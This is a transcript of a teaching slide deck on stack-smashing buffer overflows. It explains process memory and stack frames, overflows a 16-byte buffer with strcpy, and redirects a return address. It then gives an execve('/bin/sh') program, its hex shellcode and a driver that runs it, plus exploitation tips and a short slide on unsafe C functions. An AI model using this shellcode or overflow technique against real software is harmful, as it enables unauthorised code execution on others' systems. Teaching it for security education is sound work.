Presentation is loading. Please wait.

Presentation is loading. Please wait.

Smashing the Stack Overview The Stack Region Buffer Overflow

Published byHoratio Houston Modified over 8 years ago

Similar presentations

Presentation on theme: "Smashing the Stack Overview The Stack Region Buffer Overflow"— Presentation transcript:

1 Smashing the Stack Overview The Stack Region Buffer Overflow
Shell Program Notes Avoiding Buffer Overflows Conclusion

2 Overview ‘smash the stack’
Corrupting the execution by writing past the end of an array declared in a routine. Can cause return from the routine to jump to a random address. Processes are divided into three regions: stack, data and text. Stack Data Gap Text includes code and read-only data (instructions) contains initialized or uninitialized static data contains the parameters to a function, its local variables, and the data necessary to recover the previous stack frame. Higher Addresses Lower Addresses

3 The Stack Region … Contiguous block of memory containing data.
Lower Addresses Contiguous block of memory containing data. Stack Pointer (SP) points to the top of the stack. Frame Pointer (FP) points to a fixed location within a frame. The stack grows down towards the lower memory addresses. Return Address Call Parameters Frame Pointer Local Vars SP FP Frame Higher Addresses

4 ! Buffer Overflow segmentation fault 0x41414141 buffer sfp ret *str
void function(char *str) { char buffer[16]; strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); strcpy() copies the supplied string over the smaller buffer in stack without bound checking. 240 bytes from the end buffer are overwritten. The program will most likely cause segmentation Fault. segmentation fault 0x buffer sfp ret *str So… Buffer overflow allows us to change the return address of a function. AAA…AAAAAAAAA…AA…

5 ! Buffer Overflow void function(int a, int b,int c) { char buffer1[5];
int *ret; ret = buffer1 + 12; (*ret) += 8; } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } 0x <main>: pushl %ebp 0x <main+1>: movl %esp,%ebp 0x <main+3>: subl $0x4,%esp 0x <main+6>: movl $0x0,0xfffffffc(%ebp) 0x800049d <main+13>: pushl $0x3 0x800049f <main+15>: pushl $0x2 0x80004a1 <main+17>: pushl $0x1 0x80004a3 <main+19>: call 0x <function> 0x80004a8 <main+24>: addl $0xc,%esp 0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp) 0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax 0x80004b5 <main+37>: pushl %eax 0x80004b6 <main+38>: pushl $0x80004f8 0x80004bb <main+43>: call 0x <printf> 0x80004c0 <main+48>: addl $0x8,%esp 0x80004c3 <main+51>: movl %ebp,%esp 0x80004c5 <main+53>: popl %ebp 0x80004c6 <main+54>: ret 0x80004c7 <main+55>: nop buffer2 buffer1 spf ret a b c

6 Shell Program Suggesting… SSSSSSSSSSSSS
#include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } Suggesting… buffer spf ret a b c SSSSSSSSSSSSS …but where in the memory space?... buffer spf ret a b c JJSSSSSCCsssss JMP & CALL instructions can use IP relative addressing…so we don’t have to know the exact address of where in the memory we want to jump.

7 Shell Program …but our code is modifying itself and since the code or instructions are in read-only section of memory, the OS will not allow this technique. …so we set the code in hex format as global variable. #include <stdio.h> void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; }

8 Notes Different architecture have different method of running and managing a program. For example, some architectures like that of SPARC keep a good chunk of data on registers and once in a while flush to stack. Things might be well different on x86, powerPC, etc. In these examples, Intel based LINUX was used. For special cases where the whole buffer and stack memory are much smaller than the code to overwrite, we can get aid from environment variables. Use assembly NOP instruction when necessary. To overflow, be careful to avoid null pointers in your program, which is meant to overwrite a buffer. Many C functions are sensitive to null pointers and will stop!

9 Avoiding Buffer Overflows
As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. The standard C library provides a number of functions for copying or appending strings, that perform no boundary checking. They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings, and do not check for overflow of the receiving string. Another usual programming construct we find is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there is no explicit checks for overflows in the while loop, such programs are easily exploited.

10 Conclusion To conclude, grep(1) is your friend. The sources for free operating systems and their utilities is readily available. This fact becomes quite interesting once you realize that many commercial operating systems utilities where derived from the same sources as the free ones (LINUX)!

Download ppt "Smashing the Stack Overview The Stack Region Buffer Overflow"

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson

CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson
Buffer Overflows and Defenses

Buffer Overflows and Defenses
Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.

Stack-Based Buffer Overflows Attacker – Can take over a system remotely across a network. local malicious users – To elevate their privileges and gain.
University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.

University of Washington Last Time For loops  for loop → while loop → do-while loop → goto version  for loop → while loop → goto “jump to middle” version.
Buffer Overflow By: John Quach and Napoleon N. Valdez.

Buffer Overflow By: John Quach and Napoleon N. Valdez.
Buffer Overflow Exploits CS-480b Dick Steflik. What is a buffer overflow? Memory global static heap malloc( ), new Stack non-static local variabled value.

Buffer Overflow Exploits CS-480b Dick Steflik. What is a buffer overflow? Memory global static heap malloc( ), new Stack non-static local variabled value.
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:

Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus Microsoft Research Brandon Baker Microsoft Carl Hartung CSCI 7143:
Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Foundations of Network and Computer Security J J ohn Black Lecture #29 Nov 12 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.

Foundations of Network and Computer Security J J ohn Black Lecture #17 Oct 26 th 2004 CSCI 6268/TLEN 5831, Fall 2004.
Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.

Foundations of Network and Computer Security J J ohn Black Lecture #19 Nov 3 rd 2005 CSCI 6268/TLEN 5831, Fall 2005.
Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.

Assembly תרגול 8 פונקציות והתקפת buffer.. Procedures (Functions) A procedure call involves passing both data and control from one part of the code to.
Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #28 Nov 9 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 13 th 2009 CSCI 6268/TLEN 5550, Fall 2009.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
Attacks Using Stack Buffer Overflow Boxuan Gu

Attacks Using Stack Buffer Overflow Boxuan Gu
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

Similar presentations

Ads by Google